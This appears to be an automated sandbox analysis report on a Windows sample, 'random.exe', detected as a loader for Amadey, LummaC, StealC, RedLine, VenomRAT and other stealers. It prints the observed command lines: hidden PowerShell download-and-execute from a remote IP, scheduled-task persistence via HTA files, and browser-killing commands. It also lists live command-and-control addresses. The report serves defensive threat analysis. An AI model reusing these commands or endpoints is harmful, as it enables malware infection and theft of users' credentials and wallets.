Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1609462
MD5:	82770f4f16aafa62bf019d0e2944023c
SHA1:	1a5de9e7ff040d5826f667772b968c3fef511a1d
SHA256:	3102530afdedd09fe1f4900a923940a685f225a9b403c82b5ad6ef7387645a58
Tags:	exeuser-aachum
Infos:

Detection

Amadey, Credential Flusher, GCleaner, KeyLogger, LummaC Stealer, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected BrowserPasswordDump

Yara detected Credential Flusher

Yara detected GCleaner

Yara detected Keylogger Generic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected StormKitty Stealer

Yara detected VenomRAT

Yara detected obfuscated html page

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates HTA files

Creates multiple autostart registry keys

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 82770F4F16AAFA62BF019D0E2944023C)

cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7844 cmdline: schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 7748 cmdline: mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE (PID: 7380 cmdline: "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE" MD5: 62470C27337513B68E67C04784C08779)

skotes.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 62470C27337513B68E67C04784C08779)

mshta.exe (PID: 8076 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\m5569IMo3.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 8144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE (PID: 4128 cmdline: "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE" MD5: 62470C27337513B68E67C04784C08779)

skotes.exe (PID: 3280 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 62470C27337513B68E67C04784C08779)

skotes.exe (PID: 4536 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 62470C27337513B68E67C04784C08779)

b7668220f8.exe (PID: 1296 cmdline: "C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe" MD5: 9B13DA6C3CD180DA418F80EF661F9C1C)

6d81c0d08d.exe (PID: 1160 cmdline: "C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe" MD5: 3467F7BB6602F1A197AC7394236A3AD9)

conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

0a633717d1.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe" MD5: 6A7CCABDA720829B7C53963094B61BF5)

376bb929a5.exe (PID: 5776 cmdline: "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe" MD5: DBC1EBA5E0FF5BCA81AD2B702EB06E05)

327981c77b.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe" MD5: F913753003A41D9B4174736AAD5192CC)

1f8e467ee9.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe" MD5: 2C11DC2DEBC178FCE79C8C52655CBF01)

taskkill.exe (PID: 3036 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6036 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6072 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3832 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 932 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 2536 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

84b9c8b064.exe (PID: 5240 cmdline: "C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe" MD5: 12DF12FDF032C55585BB5618DE234ECD)

cmd.exe (PID: 1008 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7744 cmdline: schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 6524 cmdline: mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE (PID: 5964 cmdline: "C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE" MD5: 62470C27337513B68E67C04784C08779)

48a23b3144.exe (PID: 732 cmdline: "C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe" MD5: 113461458C920597C8529C301DE52645)

82ab3472d6.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)

376bb929a5.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe" MD5: DBC1EBA5E0FF5BCA81AD2B702EB06E05)

mshta.exe (PID: 1240 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

327981c77b.exe (PID: 5612 cmdline: "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe" MD5: F913753003A41D9B4174736AAD5192CC)

firefox.exe (PID: 3956 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4916 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 1384 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb019aa1-e8ce-4797-83d1-5e5128b5efef} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 257c2f6c110 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

svchost.exe (PID: 2152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

1f8e467ee9.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe" MD5: 2C11DC2DEBC178FCE79C8C52655CBF01)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["paleboreei.biz", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "RvTZB0--@install"}

Threatname: VenomRAT

{"Host": ["85.209.128.208"], "Port": ["4449"], "Version": "RAT + hVNC  6.0.6", "Install": "true", "Mutex": "wexcbaobhugblzgxijd", "Certificate": "MIICLjCCAZegAwIBAgIVAO9Z+p2DQtE+G26NILoKGuB/WQ/pMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA0MjYxNjEzMjdaFw0zNTAyMDMxNjEzMjdaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCFNmZsFlC0Huh66ZtyYIjwPKHeeIlGN9Y9Otqm9xtlssUM9NkX+pZtitLXh2A1aB08rk79FNQN9GPa1u5Dtmr5yTNi7s3HLwN5g7RXzWUU0sKerIrPVjkHTKWBXysHWvPBdW+LAoPGaMoRNBwxHLaQAIOggaM4BbA6VMIexTPI3wIDAQABozIwMDAdBgNVHQ4EFgQUc7VXwFJ+WUL/Qv13lijwfriqzTcwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBb1Gtc2Fh4Ak9/N9K8TePvfcAyfC5itmGot+GapZal4lsD8NAKM8Qo7bWi5bx44tmBcxn3OzbTvk+JGtguxUQhodPQKBv2Sw0Lc8EVXnPLueLxlU18n3M/fpyl75YoiFDkMPV2EFaPrLUoL3af1XJ7ju6ZFDtzgaq49NUVZvR09A==", "Server Signature": "QeY1hnWAi6AJAPokZ5vkCF1hkVGgdVKo20iYLtYHaEUeEuFuA79XHT36+TMn4dXe1HZLs+qkGwv+5zobJzK2CRXhHFAjsW6hELnOCYFkshmrFJIcp/gnxz4/Fbs64dR8FUILwQIvzXz+nqNySImMp8T4pyfbfdq/G7gL6r3hcso="}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\m5569IMo3.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000014.00000003.2653292300.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000001C.00000003.2873139387.00000000010A9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000002.2788073324.0000000000A91000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000002.1511384246.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000017.00000003.2467295443.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.1550989507.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000003.2462878413.0000000005450000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000036.00000000.2638833274.00000000005E2000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x83d96d:$a1: havecamera 0x888792:$a2: timeout 3 > NUL 0x88bb15:$a3: START "" " 0x88c02a:$a3: START "" " 0x88bf05:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x88bfa2:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x88fd66:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x888002:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x884178:$s6: VirtualBox 0x893cf5:$s6: VirtualBox 0x88f712:$s8: Win32_ComputerSystem 0x893c5b:$s8: Win32_ComputerSystem 0x88c83e:$s9: Win32_Process Where ParentProcessID= 0x88c45b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x88c4f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x88c60d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x88c6f5:$cnc4: POST / HTTP/1.1
00000019.00000002.2504597683.0000000000A91000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000D.00000002.1534507361.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
0000002E.00000003.2639164297.0000000005260000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002E.00000002.2848956151.00000000017CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000031.00000002.2696699467.0000000000401000.00000040.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: mshta.exe PID: 7748	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
